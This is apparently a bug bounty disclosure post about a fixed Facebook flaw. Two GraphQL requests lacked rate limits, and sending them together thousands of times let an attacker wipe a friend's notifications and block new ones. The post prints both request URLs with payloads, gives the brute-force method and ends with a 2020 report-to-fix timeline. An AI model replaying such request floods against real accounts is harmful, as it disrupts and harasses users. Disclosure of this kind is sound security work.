[Facebook] Deleting Friends Notifications and preventing new Notifications

 By exploiting missing rate limits on two GraphQL requests and performing an attack in a manner, it was possible to delete any friend's notifications and even prevent the new one's coming in.

Similar issue reported by me - click here

POC -

Rate Limit Evaluation -

These both requests could have been make with more than 4000 payloads. This was taking less than a minute.

There was no silent blocking because after the 3000th payload, victim was still hunged and the response was giving a success result. The response length didn't differ throughout the bruteforce attack.

Both requests should be made simultaneously.

Request 1 -

https://developers.facebook.com/tools/explorer/?method=POST&path=graphql&version=v3.2&doc_id=2501557149952408&variables={"input":{"client_mutation_id":"10","actor_id":"XXX","participant_ids":["XXX"],"content_collection_id":"XXX","role":"CONTRIBUTOR","save_mechanism":"ADD_BUTTON","save_surface":"SAVE_LIST_COLLABORATORS_ADD_VIEW"},"scale":1,"useCase":"SAVE_DEFAULT"}

Request 2 -

https://developers.facebook.com/tools/explorer/?method=POST&path=graphql&version=v3.2&doc_id=3163221407084978&variables={"input":{"client_mutation_id":"11","actor_id":"XXX","content_collection_id":"2157516397876473","save_mechanism":"REMOVE_FROM_SAVED_LIST_BUTTON","participant_ids":["XXX"],"save_surface":"SAVE_LIST_COLLABORATORS_VIEW"},"scale":1,"useCase":"SAVE_DEFAULT"}

Timeline -

Reported - Friday, January 3, 2020

Triaged - Friday, January 17, 2020

Rewarded - Wednesday, February 19, 2020

Fixed - Tuesday, March 31, 2020


Popular posts from this blog

[Google] Access to BGP server + DOM XSS

[Google] YouTube "restconf" Swagger-UI XSS

[Google] Disclose hidden Blogger profile Display name and Profile photo